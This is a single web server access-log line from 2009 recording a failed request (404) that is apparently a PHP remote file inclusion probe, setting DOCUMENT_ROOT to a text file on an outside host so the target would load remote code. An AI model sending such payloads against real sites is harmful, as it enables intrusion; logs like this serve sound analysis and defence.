67.227.136.138 - - [16/Dec/2009:06:40:36 -0600] "GET /logs/access_log.1253923200///?_SERVER[DOCUMENT_ROOT]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
